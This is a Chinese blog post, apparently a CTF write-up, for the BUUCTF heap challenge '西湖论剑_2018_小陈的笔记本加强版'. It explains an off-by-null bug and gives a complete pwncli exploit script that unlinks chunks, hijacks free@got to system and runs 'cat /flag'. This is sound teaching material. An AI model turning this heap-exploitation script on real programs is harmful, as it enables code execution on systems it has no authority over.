Loading

[BUUCTF] 西湖论剑_2018_小陈的笔记本加强版

西湖论剑_2018_小陈的笔记本加强版

总结

常规的libc-2.27版本下的off by nullPIE也没有开启。但是没有办法直接用bss上的堆指针去泄露和修改,所有还是选择了两个大的chunk进行unlink

题目分析

checksec

image-20211017171750709

漏洞点

用户获取用户输入的函数存在off by null

image-20211017171942630

利用思路

  1. 三明治结构,中间夹住一个0x80的存储有指针和长度和一个0x30存储contentchunk
  2. unlink,然后分配到0x80,修改指针为free@got和长度
  3. 泄露出libc地址,利用edit修改free@gotsystem
  4. 释放/bin/sh块获取shell

EXP

exp均使用我自己写的小工具pwncli编写,下面有链接,欢迎试用~

#!/usr/bin/python3
from pwncli import *

cli_script()

p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']

    
def add(size, data="default", name="lynne"):
    if len(data) < size:
        data += b"\n" if isinstance(data, bytes) else "\n"
    p.sendlineafter(">", "1")
    p.sendlineafter("please enter the name of the notebook:", name)
    p.sendlineafter("please enter the length of the content:", str(size))
    p.sendafter("please enter the content:", data)


def edit(idx, data):
    p.sendlineafter(">", "2")
    p.sendlineafter("please enter the notebook id to edit:", str(idx))
    p.sendafter("please enter the content of the notebook:", data)


def show(idx):
    p.sendlineafter(">", "3")
    p.sendlineafter("please enter the notebook id to show:", str(idx))
    msg = p.recvlines(2)
    info(f"Get msg: {msg}")
    return msg

def dele(idx):
    p.sendlineafter(">", "4")
    p.sendlineafter("please enter the notebook id to delete:", str(idx))

"""
libc-2.27 off by null -- malloc 
"""
# unlink
add(0x10) # 0
add(0x10) # 1
dele(0) 

add(0x420) # 0
add(0x28) # 2
dele(1) 
add(0x4f0) # 1
add(0x10, "cat /flag||a", "cat /flag||a") # 3

# off by null
dele(0)
edit(2, flat({0x20: 0x4f0}))
dele(1)

add(0x4b0, flat({0x4a0: [6, elf.got['free']]}))

_, m = show(2)
libc_base_addr = u64_ex(m[-6:]) - 0x97950
log_libc_base_addr(libc_base_addr)
libc.address = libc_base_addr

edit(2, p64(libc.sym.system)[:6])

dele(3)
p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

posted @ 2021-10-23 15:24  LynneHuan  阅读(96)  评论(0编辑  收藏  举报